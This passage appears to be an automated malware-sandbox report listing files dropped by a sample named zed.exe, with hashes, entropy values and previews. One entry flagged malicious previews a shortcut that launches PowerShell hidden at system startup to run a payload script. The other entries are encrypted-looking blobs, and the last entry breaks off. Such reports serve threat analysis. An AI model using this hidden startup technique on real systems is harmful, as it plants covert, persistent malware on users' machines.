                                                                                                                                                                                                                                            MD5:07210F5BB88677DE5AB03BE788D16878
                                                                                                                                                                                                                                            SHA1:C11D4C6AF395B3D9FA1F2BEB421557B65D0C335B
                                                                                                                                                                                                                                            SHA-256:08997D2B2414C476D952831C3461C71CCF10FA1840104FE49E1B21335BEB0BE3
                                                                                                                                                                                                                                            SHA-512:EADF82F2ECCE5BAC4CC3B9C3D4B243AE5D1D437C44AC83EC492A11A06AF5323E24DCA0531C2B3F6D14C8AD42AEA7189084D20F4049C85A9559738D0A34938027
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....Z.1...........System32..B............................................S.y.s.t.e.m.3.2.....t.1...........WindowsPowerShell.T............................................W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l... .N.1...........v1.0..:............................................v.1...0.....l.2...........powershell.exe..N............................................p.o.w.e.r.s.h.e.l.l...e.x.e.......".R.u.n.s. .t.a.s.k.b.o.y...p.s.1. .o.n. .s.y.s.t.e.m. .s.t.a.r.t.u.p.Q.....\.....\.....\.....\.....\.....\.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e.X.-.W.i.n.d.o.w.S.t.y.l.e. .H.i.d.d.e.n. .-.F.i.l.e. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.D.o.c.u.m.e.n.t.s.\.g.o.g.j.o.t.h.e.g.o.a.t.\.p.a.y.l.o.a.d.\.t.a.s.k.b
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.9812685460234
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:1PpF/5iUo1qZ7ymEUYYAoNKwYHniK7FX8S6W372/Al6KU:V/5x37ymEZHcKbnia6y2/k6KU
                                                                                                                                                                                                                                            MD5:0E45306A48867DB33E9BAC3B6CCD17E4
                                                                                                                                                                                                                                            SHA1:B6FEE817E428F34A0D105C42A3C495C34DE15A78
                                                                                                                                                                                                                                            SHA-256:2D94C0ED9C18C049982680E2C6270E69C3946ABEF9AFB898CFA6F99BC02E5EB4
                                                                                                                                                                                                                                            SHA-512:D83344FB7AD0039F281FBF0E1FC569180A8A01E90292A93268782F50B9A23C54FAB7AE8BD978473941D44972FF7D81B39A2E1F66B44974037CD16F5A45047AA8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64MkoGIq3kgVZ-JjCK9WojfvKJQHYs11gd2Pi3TIAkpgc8ygFwG_v0kwvKPAkhSbbe3yYAViDLSYQ-XRaVUZNQKT9nBfNdq3YSSe7UWN6rLruOSBJXQonpKNLrYJQjUoZWIUc40TogtPsTXl4DLeSSmq1hAhF4NdETINm4EZEjUOj4xPDdtRWcnBCCFrH5NccRtlIop5b8Kw-5JwF1UTr2c5VP2CMZ8neWRgKRRlrTOYCt4lBAVDtks58cxpMdWNqZp8-quyEvc7vvTdbHaE3eWR5cON7nyEPTcRJxahZZHZ-4AMgZO0iPEe8ERs6jytvsGD1oTUup9CGlhF1jcyiQfyWJe0TcpI_JE4IOod0nJd3XTzSyqVBVq6df0etP_iQ8NEZ6JWRz_pccJquYXG-8hH44tuCfLty-GQxSmMpR6N6OxmbVoy_xSGJAk_wGn4cxJSvkCOTb8KRXd-0vTdVMCyJjISDONb2Bn41PhLID-3K12x5qvtOUh20SvaMgU2iToUtL2QXL3IEX48lYkTfDN5UuwYbGykotjHoo6NeRnrqWVvJiEdaPt0mHb33-bOxbmI-XP1c1zrVMWzRLrFDIIp2wxTbB2Czw4Z4LbA9eCzKA4zKU0SGD4WuQVQBnZUZldzYQ1S5AesyisrN8i9yFydPNqZO8CFK-Ric__XYCabBXt-w6oef3h06zXTefIARzetYrZZx-RqL0r2YH9PbE0uAktsH7dX1eZ5FA8BUShGomJOGuU_q0auP0DCm3khwGjtMfChcKQZWitKl3MGiq5J_TnB63cEqTcN7tWW8gmtFt53oE_IFLbtCuecxt0bablmJJH2EEwFODsXHgdoMBoLEPWKKmRzkNARIrWZwIvZpBn0Sqzc0dJb2E8ToIKij-YJAYJY4ypnPa07-ixlyOFOreaOtFF5pgvO4_gAvT0d0eUFQO6h-hMWWg13hLL2d2atNNDmBJGqU3jX7omgs9G2mjil28
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.974440351461089
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:zPwzi3kG9vCvMN61Q5APXsWBxWEnzUHHB1hPrO9tYzh:74FG9TNp60a/nAnB1lrO9tYzh
                                                                                                                                                                                                                                            MD5:628238DFE6EBCB77C17F758D1C1D3737
                                                                                                                                                                                                                                            SHA1:DFAE6C234D9B8D3C779CF03C41C6D0E3032FF2E3
                                                                                                                                                                                                                                            SHA-256:617DEC432E29D9BCBFD41254D19E6E121A0FDA62954ECAC55B8C3D18FBE88192
                                                                                                                                                                                                                                            SHA-512:C7D426B575D17644ACD0E3D928E967158CD0308784E0A1532DF648558E323372AF8E63E5AEB4684F6740047B4EDBF1554FE05D896D3B82888B2A4E0E25E301B0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64_XEyqjQDi6pP8I77XlHFk61em349fHRJGPwq7DirELTwTiBrqJIaRMibsfNZ1LTPO9mbKx6OUEqPd2Dl4e_m8zItFZd-_KDRRsQuuC7Kv7rAJUNaNSPsXxDXf-FFggxYdh4Pod-7WxR75eHXS8oJhI8uy7ds21wIPsHzLLo07OFhpfvcryAp20tr7L_TuA_x2sbJ9P0JdzIZYiSZm6a88SmEnjO8ZjpU7uK8owxw-bCVCBf-x70I7qd18pis68TdocmJAUH0Mtbk0qzAYpwIWsa7tAdm4yCsBNiJHBrD0nHQKWOl9wiWBIhUKXy8QjPNX1Futw8ZvCE2CzUohdd3BGu-Vb1xORqZPtxvAJ3jTdbWp2iOHH13o1z13dmiY7lqUMl5MdBsQ_7_9B_nJ4nJxyCixALXB5CYwE3Bj1a9TiIKv3RrM9KPit7npTylhvbAK1LWQm-tcowHkHAmPpRJFnmWpEOIi_l2nozBz47VXTIsyF6-f-UhXxcmC0YFAFuq8pJC_L9GCpeCq--pnjtyu_fJVniUymy7VuP7tCt9w7rvAzPatlKFnHLzNUQklGWKmBQpWe51DjGJd2sLvARj4Lz7t6cYGGfirJ6wEle6ZKUg1HA-HaC_XMw9iij6BbTKdvhLWttPRo6wU8dw6l9GAZF4JWsDyLw8AoqsYbZb9_YovXqVajk_78td66nmc3GGy3DsGOi3TCcMqfH3zFnrff-2rQwdVqNaea4gsFV_G-8e2B8Oue1KHziGpVPKmatCwuqNmJfhjk8zOgEDAACVqQ-gn9QQ75svB0BdcCZcC18PVPJx4RLFN_koAIghpJI5jStiwBS_RHqEG9SfdoNdsj3IC6UoBv5ezlv2xjrbsDhQ9QlQ3xnuFfeLe9XI2S3ND8FsJQ8wqIR-VJZSTIe1oS8TKZ42y_livN3MBmClyOW3TlJKWmZ4gqgfK_lV-mimVT9iNzXCcdTwHNDUYksOM57sdBxy
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.9847420326678735
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:m1y5JDZkWLAprAmsPb2/WDScGvN1o6n+3c9GdD5P:nvVMtyGFrnb9kD5P
                                                                                                                                                                                                                                            MD5:65B68B384A135CC73313A001A2831BB1
                                                                                                                                                                                                                                            SHA1:69BC26D0360EAE6605E8E55954E9D1DF2F27A453
                                                                                                                                                                                                                                            SHA-256:588C498439DE4C0244CCCAAB0995B811FA44101867D9071CEF32EEFEE9008101
                                                                                                                                                                                                                                            SHA-512:E0C1D361B7A43A7D9AB208544A0A5079D53763507DC9C3351E1A7882519B355ACF5BF4FF3F5FAD2E31D6E95DAF601F3339E19545A8D0CAB8717CECF9FB188C4C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC642YknMJQWNqeyyPyv1zOdRBlQGrSp9PvlvLR2ytjbhTzpGu0guSoixLhfztCnDFSgZMSg6G-xzKqt17erh0rHAeDp7iyvgJsdONv1wSpsVDHCZsMMwqwPRrYICsbmfr7d6hsRtjI3NN-iGx8kZ4sgj9th8fCWdhP5NH1nAdRrA_eta-jJd7rIa2aPaozfbrWC6-wzqC0O4fhHwqxD5cuZzWB5yknJJlGSdPFKpa2W5qOk9xmQIm_JH19H3eIG8wQ92G009F7dtV_kvZ7HhlgZrWzMweajHgL8RrZTA8v2iG2R8bZ2F3bvo7yrVrY-TWUjylm4mvYK7w5oXpYQLSqAp9DRCSj0ZPBOF7obVMASSq3KC1hJGwKX1TnSF1MHE-2L2dTpL2oQN_2AgtjrVoa5oLQPIyCX-M_YQfqqPUGtzbCCodFk1k_L0Bflu86pO6mqKhMvmUPAsYY0MhzUc5E3ZFeQqkIzucyD1YLmzFL-4nthAoebCOextS7HhzkBM633AxQLmZGpll4Vjmv-WyTZkz40w1mZVwA5B__hHiQwzoPkWKD8DlODUULCbx7yCwGAR4KHI3d3r8jGKTAEjnhNmKqTT64bNjkkUq-ixleyOZD75H9zZ4ovVqljF-Ae_ujYz1YCNZYLxI-JlV_Ostz40XKVXj-Aj2cE8MsWY7ZCp9YVQN-xotSCejCYzBrjLt8dFBRpW36w_OhpFEn7ljq7h3Y0cPyk8t1OrZGbh-DZcKQnc9ORbv-7k1HDSamDsZpFmtV74JHTZPFI87kZqdx1gIeSbY2TEL9yCCMbTwITEmtmq6pab4cHoIhcEMhe6COYpSv_Og5HBYQVMBw-UyJIgGbYvKFEZjekHE6ZlePyYVGZb8Lw7depfPQIiQm8JZ_l4W-gK-AFfAFY0Z5qFJw9MtreftXWlbgxbc_lxoyzQ1abU6Gv5mIDYsVMwiRkx-CPGSe5i9bb4rEcUlPbMY4WNG5nS3um
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.978787441344659
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:WRoK4wtpOtgD7Dva01UacyPtNQE5qfRTLSi:AoKztpqsisz1jo3Si
                                                                                                                                                                                                                                            MD5:EC818A87B7AFF0789E958328A510AA74
                                                                                                                                                                                                                                            SHA1:5B6054D98F2797DE623B4F324BE6DA96D60B99DB
                                                                                                                                                                                                                                            SHA-256:66A8A1B03FD1D5338048B538E864473589FD468CD507D07A09164B5E76FE7B7B
                                                                                                                                                                                                                                            SHA-512:3C69BD197D95E560F32DE96C33FF9A34E1DA470FF0E435C6E165B92D55143ACC169EBFCE542AA0979D8770D65EA732C641199AFF69042E85903C1C8D2F101D5B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64Ea4P6_1821nUQCSZGvUDLQUCnTYwr4VfqilPj4TwYlHGSNkkllEE9z99I742yA_1lYtUd6s4Mg6g_zQmk97aAgoGcGClWcNNrbiy_sGau5fFcQIbvzsWSMEpoIWrAbGyxJmwdg3yJqd_tPO1EryBA3-qtQX3d6gKYb7w467EUmNc6lnRPjSmTycAA39J64JvP4AJeeZcdMjVAr-I1xU34ldrot1p_bNT6vIe6sSCp6OmLak4ARCuZgGFouolDHflm1OBBAQjeXqwqSHQ7g3pWiKZoDYDrw3QHDqsL8_sGyHx9r4OIfoyE1TCtrn_XpXplkTsvtWjjX6iIfW_2p2QQiuYkYngTrczKqf_8UwKY110oeAfGq_6xcsV4ZqMKz_Nx5WyD5YpUGJlhYH_ELyRoi5Po9ZcA5CajyVPe0ekSuqUzxnC_WSTJx2n8KHDuQ2EnGzWqhldBlSHVmeFErmRqoppjcFe3Q5qbbQ-xDSsCYo62MtpJkpGweCm0utYySbw_-kUu64IG98MS7OiLjNwsJMtwtvfpwyXfFKdNc9w_OA5Iah4K8pIrJFlZlqro7QR2UXkzckqZm-dB3oXf-0JXYnkQCJonit9gqy3wjN6_ytZchsjg-NBZQvqWX-z5J0pKhnWnf9_TWMY_38xE57S7Q45jHxONECh1DrSMiao2yhheezyk0rHFdxYhs7jRHZg0T8xeT-CS9rlRhpaapaJAtS4BfyTsy_nmJsWJPLESYlsa5rIr0M_wQwwKeAtu4SPmpGtVJ__wmSgtPuAgUuK5kvRqIoh8_tpFgraanSbtvGc3YFCiByDG_jVRU81T_LNdRPHcYZKhwUb2LA0nWWuWVe3iXRcFhUdkWNn_dGk8apZxVXKv_34HON4p4OISI_9pl7W-ED-Yi9xZ3f4XZHrYKTameIuOrRi3vD1fLZhTN7uljnUDh6IXc1-FZdIuhFs5-8OQAyx6kf828huztj5k4bW1X-6
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.975808024694867
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:DIr0ZunwZwvR22hCpqx7hurrg2nql4MqZYnCRKdPc3odx4rj:DIr6unwZaw2gpqburRA4r74zxYj
                                                                                                                                                                                                                                            MD5:40F46A719B592C8E2E4EB28D37E54E9D
                                                                                                                                                                                                                                            SHA1:5A107BE158853FBEF44147FED0D12BFCEDB4A7B5
                                                                                                                                                                                                                                            SHA-256:D747F69FC0CC90D563961750FE7DF484C3972E5FE78B718DB5C161E578A8BEB5
                                                                                                                                                                                                                                            SHA-512:1316D8728C6CD6EF1F178C560FB171F104F7B656BA736DAEEC83D9B0AFC784C10517126E0471105448EA56893F44518D552472601914C0F83A86D261D29A7877
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64Ot5HMsK3vHMb4Gh9bsmqkLs_cgcy5Oh78YvxO1ajzHEgDsIOUMVbTk2bskw51_NGHftg7KQZP5A2zlH7CxBjg2L2nvJqPh_GiExO0I3X4b6xxGJMLgJL0sH4SZGV-DCgVtPKZnHnFvp94ZcDySpusGqMHwu7B0xw1RtsfntCcCdKL4PXMRJnPijLjb5KEKPeA2rwo8fjTvib3jUdy0nSpYV0xRnQK__j44YZUjvp5MxX4SSE5-Aihuw2mU5qoFD5wXLqGsoDOfA1F54VaeivRekcMICW_kEZc0_cHCF0C_Hs1IC9xZUxfJBthwicFgZU_um5VIr-3pMdG_zWV4ZffnqdjCFUvtcv2bcbchDY565rfhTtqBsYJToyIt-kLjgfr9Cv57eBp4isG5GpS6wHxayrhPVgnwzGeek2aGPNXOeu45Jkq4S7nmaAibf8UtbfqE0Z7V0OX0wnAiRXTtUStsP_eHhrSVbaOf-uo8YpmpxexNky4Iocxqr1cpq2B2nMKTLN7gbsjsQl4gcyTtS0CRU36AkPrkjPajeKjw9HhvxDxj-6teZd5NYXt70EGNB8WvB74kXqV-yAcH5_J9YdQjsPl3AKa44yoQjqvwzsRzgwreoa99BSzAwj6rzUEq_6VUiwQIMzyx-M-RxpZd2y9TcI2zvotAPF_KyqBp0iDZlQRyOnbjC8ZrLIfiM8MiQvId9L3_cc5nemnj4b1Q4bF1LVcVTbo3FFsMqNQI_OGnKN5wrC3BbTG4fC_qSCd44JtE5N-YvEoPyDFSJe13AbgPRw6UUekCXhVB_jgM8APj4NZX45IeivQXf9zWSCBbrV0H5DXkRN_GH0QSSe1-qKKJ-nwUssO0MV9nbi-kIaxs0Pdu1o7O_x-qeaSY7AGLrqtfMoMdzJEPiBCRZl-hQB1oISbX0b2axGTIaQdMdBF6aAWSbRru44uGgPFZAmQZoFBBdiJHL7gbocEChis1SaprfYILYN
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.984669978127198
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:G30Cce8wpyRpfaWdQgyFWtWV2VGOyKHozlHGqO7RjdDOzljgh8ZAU9wvxgZ:LCTkfaMQgdUOyiozlmqYbOzlj48rt
                                                                                                                                                                                                                                            MD5:9513597FC1D28C6EE6F646DA8E5F4FFD
                                                                                                                                                                                                                                            SHA1:35891E3B3C2C2C53E5CB8A7A4D1F8DCB70F25DD2
                                                                                                                                                                                                                                            SHA-256:006A6C287D7D6E73C3DB2633B03F6CCE17CE4BF6A6C8731582428ADFBAA09663
                                                                                                                                                                                                                                            SHA-512:3F5A98F1E96C42C64D595CCB051CB0877F77159CE51A2E76E30D6A79C493C94E35EEEB166942C3A153570D2A7E37F5872273FD0DD5D4B914C22DD3F19A327589
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64mYUEiedBN7tkTky7ih_pvfwlGYvCha7jYIxJxmztRw_iHm1NlVueAMYRGUsn0RIDrDVyOWPaCKNkK4gbD7k2LY4JWGiFxjw8kDfP-GBE0WOJTrEnn-I9NXxe6XZepdvFqgOLEHgFwYrnXLWlnlz3wX0u2GVPl8PpCjL1ibmdyewlrcgb11OszWxIxOn_YtSSAhG4b4xyNuAfQkPZHTCyrTbwsqHnT2o5HaWveREM8pmp_4OLIHJTT403NZib8pa2_vGoBYyMLI3vcE7reZfjF5uXbiJGwjSapxsFEy1YFtgpsVAFVILSY8GRneoyjoumqdNd3kmvNyMaB0Cnzz1V66UW4_QsQBhnzk4FWHHJJzWcLV2qvR0Amw_E9bBFYUxSAAp3DqxL25OitXUdRhMDQIVgk3EUW_tS_2JzUTRvJWDPT10987hoBVi9cfoF9bt_5wPASTm9wUrUdvlnoAQFk2s3JY0eW3g_HFNsJOE9X_DGW7X70qdmSjijctttmp76LFaUF4xYw9usimAPdPG7nafeXR71teJLEpzwzC-DvuC0S549b82_ZqvaDm_KhHPTGOLmjjG_fo2hRNVUrPaAS26qiC77RRSNiyrIOk1oG3wbJQTz-vOhWPpvvn837uzLKmSfjHN7SR-nOBmPRXVmkBUdLQVx9U_0WXPFRI8tnb-P-C2JLr-xLxK-jhifr-nJDuNAau1nOjQPAy8Zx9vn-aVe_cyfsSBvAwDurwxxQ6xmqZAWvlFuHOLB5fXPFSi5aAeeR4472HiqpCjlkerJ-zbvApV-e6f0gHa-qLw4RDDDTUmWmwx1yG8IZfc8Uya241IjsO-GXtwlbkoGggpXkNX1EOJV56fws2d4eIglTVzj1Nw4xbH_E6Qet9ZEmIS3d26tCgLn1HQED1jTnrzWxi6QXnSmqsrsn6sQ9MdqKtvy40s1hdjqCiFQKxHhBeYAPsuce7cuM9CMGj5gS_Q3xVYn73g9
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.9729727103310175
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:i0CO/A+HqCPzA3TMXH1zFmJbmmhvspEGhAB9C/VNV2ginAtUC8dCiv:iTOI+HqczaTWVzF+qETGhABQVz2g0AG7
                                                                                                                                                                                                                                            MD5:8401F06D98A2FE78257288FF87EB0AFC
                                                                                                                                                                                                                                            SHA1:5A28C855003AC04ECB9F8853C274E5A2D649F6F7
                                                                                                                                                                                                                                            SHA-256:C55CE7BFD32B39F14E9E1A0D6BF2E8A3E5420818153F18158EFFD6987B636344
                                                                                                                                                                                                                                            SHA-512:A8C8A3020183EBB078DE20CF56EBBB943D381AFCE9EFA008E116BA65EC3F3700F4326CCF6B0C803B34B35856B1985AF2744854D2BDE752927213C38B1C4BA5E8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC640cC59-G-xMqp9YMtyIHntu9Sx61dN3McnK6deXhlT8quP5y_lKM103hxCkhWVQqzEzw702ZsmuyzqlBTh2vT78A2ZNal-Ej3mXKDNJmjS8HqonBDdcHH-UBGvxaOHXJ5pYbAgW74-IEhAkcUTNoI3x7odhtK7Jg9Da-I3MBScqPst6EvDGsjDIBioioWeOPnVFbzEgqbdno2sXANVBC9jQt6iQ7Ip6PpBW5hgcb7rXxOx2DrPY7W6EpcSWLs-vN_Q4i5wtf8HOiEZ68l5WI_odsly59SWYIAITlCMBB_Lhjl35vB8mLR9ATmTngr4zDJdYFDAiqKTlVjPbF3zidYEsuBNsle4EoDPVmQLGB3yZBM6OnQlsqIxpGLxTgkZt3Hiv5Pz5SXTRghtDBp-HfAvmxQ8OZ5gqm-vXvj6BPdW1owOQfeOKWKD90GzR6wrtfUmh29QK9yQsYN6kLkvqr_DHpHPJhdtV1Bndi3J_KCozfAaD4WHxUhfM8uIYwon8dFxA26cIAUzt_Xo9icRju3JWZlhjIMc_tXYCaKgldkLA0C6VWa0JrKCIVPDin15VDpeWewP3rpYy5vjyHvgLexsrFidki-g08m7VnkmftS88CDueTN4tGDwuYVujDcM85PpxwQwPZ16a7DNtJNcr0pHbillk1r1Zz3R2svvBgDjs05AKdCvuvCmLVEfXEOqU0LMbcmK2WIrV1YOnokxMi1bsZDwTQ18li8Cbj6AysbGZeu9_AXH31TJRmYblb5uF28h4QkksqVBJBVAsVp5pvnEeffn6b7qERvE_biQPxjHxASig93cb8F_rkIdwVjQI8CBGxkr3pRQ5ZQV9sPx5XkVmnNwCCyYPm-GxYVNUxbL0HWYFgg_G8FX2wlUiMQQrDgNWFkIuSH1Whmjh_cyd0-YARX1k4-_lcQGn0_LA9_-mkwgGIZ6dflsFYsCGzWFaMtXg9Bpi7RaK5RQp9H9qPPLPIT2cVu
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.980694306213524
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:yJBwXXW0u7XprZ1ivobEQXRoQI+rUrX/wid2pK7V7c9dA74bD/8PJ6:yJBb75NmobNRUsIPLkpw7c9dA74vC4
                                                                                                                                                                                                                                            MD5:AACBD927C47D5826129F1B638330BE3B
                                                                                                                                                                                                                                            SHA1:8564274ACD0BFDC243E0B95155DEF3F1815E8143
                                                                                                                                                                                                                                            SHA-256:958C44A43DF5828E99734A0D7E9ADCB5C41BC2C147D1E1FAC65B52A6DFC5FBCE
                                                                                                                                                                                                                                            SHA-512:CFE64A63B5BB55465B029FE0D834C647F34BDA3A808718A0FFD6A6B2547529E440B3EF909FBD4A39DE9F75C617B023669C12D1FF24E1C65374867ED51CEAD647
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64DR71tOEaxpF3_Nkj36vWIHDuqtuRf7vWUhmNiwex0I3K-B6D5fAyp0zSJogUR5dT3rx882Q-Jw-KoCsxs8LXYHRawcPR7EqiSpUF8o9pyz8yGTP10awOjdM-VnBwcNxVG3pnu1fQQzPwmJoL9wpeEZXNg-fhVXlFIs9XkhSoRQ-WaBfADwDLm95136ACKDR99ECOrzx0A0Ql49Nefs9ERe2xLvGqszmFFrSEZ-Hw0OGE_J4Zz4ZT4_raopJpuUYHhjYujVKjiwEEenElnPlbCdEEjZakxORwsP9OJTqTYu3NPz-aPQRnkNtlp63P6zRf8-88nzO_0MR3ubDrJVrZCvvxlIhiZGN5xHwOuP6ugF8ODf1n3DVuSJJd4OhzsJGI4a5EfU8bO0sWCVW9AWEWR7RZ4oODbmPII9Qc7ZR8Koa2f-SSnYfi2hCHsEJ7nKIp4ND-M00XVS564tVYTqQKw4BeaGzCdaF4G2xbWGeg9GZDZAHqcLew-dLq5mxdyvTdb9aUu5lOXnn8z8qpm4biRt0vTIux6sknlmTKEtgmcHByVGisY_DjO603h8pgpkBdrLkFfHyqRlAOFI7i93cf02zXc0XLLkTwg4vh-ifHJDuefKp_bEtyece35np2oqKrgVUQFq3VQa0X_NxTPJgpWxN7e2MS7pVmoY0WtaEM7sUzVtehIXxVUpFknA4NGq-ncZwW3MQJGRyfr-XOftKuYfNw1Hz8w95RPM50n3CQoQc542M0F_arhMbWtHrvaYECFhFgxv9bS4Ip03dGHTK3c6Y8ZRguEy9qYnDkCXsrzxApG7adVqgkaZpW4tCCGKFvARwWZ7zNlbwzND93YGjatPNbntSdzCD8REczz9wv3qgsyveLK2Z2pCtz8Lqm_MmCnYqVk1vBnsjxKsh_fdfhQ2DZiA1hM9jTZQCFCQggZ8Bb_AXbxChsB_taNAkuHckyCjRusntN6QTdsygX6YQsqvd6l8RF
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.979844080947979
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:TowGZDt0aE+9GLoALRmsSQLOXH20zuNkdjaikeGlNP5:EwaWaE+sMe2Mk5/jLGD5
                                                                                                                                                                                                                                            MD5:2934738C0F8906B4082BC6AC3D190661
                                                                                                                                                                                                                                            SHA1:87366D501C7746EE8B9997559CAECBA01AEA5428
                                                                                                                                                                                                                                            SHA-256:417F0F964A4EABD06729C81A09321911155BA20587F0E75F8FE350F545AAF60A
                                                                                                                                                                                                                                            SHA-512:02D36211E437AE16BA9349A25C7B21110BDF0BF1130592864FF02016B3BD697680B431E51132B412A731315BA8CD9933282E85288C7C3CD4924BFEDCEE34033B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64fC7Nwz7FNwdpMuJI8DkNqeL6deIloqs9kOdcTLlQ9rlKKcLbz5Q6SQzziuZ2d0AAJa4dYAvuev9hhGVnSIq__C2PqDPvF4pDMZ5XNY9AIhbHyk-Cap0W5FrOy6ybaCfEI3TnEfm_TM6FzW34M60FPWUNLXCbzN9FeDY8XmYqnh1t46APL1b8KIz5vKL7wdMtTtfyQvntlRYq9YoJQ1YJk_qW_pKeNdYZEvopY8uO0EafDYWrzfYn6TceTSjGwKseOpQRhHSC5rmuRMdp98sMlm1vzui27XFiQij6HNCqXswHtbTkAkfpkUnS_YlvGGPzZH2bpwzHXne372_HZI8cPAH9fcm8XpqrgJHEPOkUkqn8Lms6R2aSNJeahcNJ4Dy_gGxcsbRPL7NTspnZCV3vkaHM92Jsoq4QMPvDZLDdRwDkS335KE5S8VLAHGuoTIgXfogDVV2sP9EDW8SxL29ay-jBYz6JtHoFBv-GNGHDMP0W9hi3VMtbTt4mZ2gY4tVR1k0sIrA5Edtkpd1zTmuCgU-1DZXssu5yTUuJfBU3dmJllJGh1LUlZhBUqbYxvTpQXyiVJX2fSl7839KDL2mNfeRW5lFL320EiSTlz2KFrv0QXtilfpr8Ofi1cfFVeyhYx1oBfVLsLpM0GWoKffWmVJgsHOnKo_mbJr1JhyXrSzKQ_ytLXGZKMFT1aVzbcD-RkZczTsfB87M4uHW8ClQH3dFy4VUl8_J3VqvLHnmI_u9iiPyMeHvYPLfbd_C0_QJmNklVhKHuxyURn8iEtH0Ha2BY4bOQdamSe_pjEjnYSM7SaEi6zqaJHdGa7oM5m7Ax6GaoMzWY4QOSru9n6gXQYnkaYV2GPB9_WVZuBTIOuLDL0K9qZu11iGjcRs7yG_fPHe9u_CAAv9uytX_lH1wyDxhCRR-A7ZtHvulDrE1vqag7qdKeHcMw1qGBkeuzrisY88FNtfaZYrybN9W4p6V5c1a14fIs
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.982415909685306
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:ptODxaHQjYkFpqNVC7uUXUxdHT/CHAv62Yzzkg8kNO5:zOOQjnpaVC7uUgRsAXYzf25
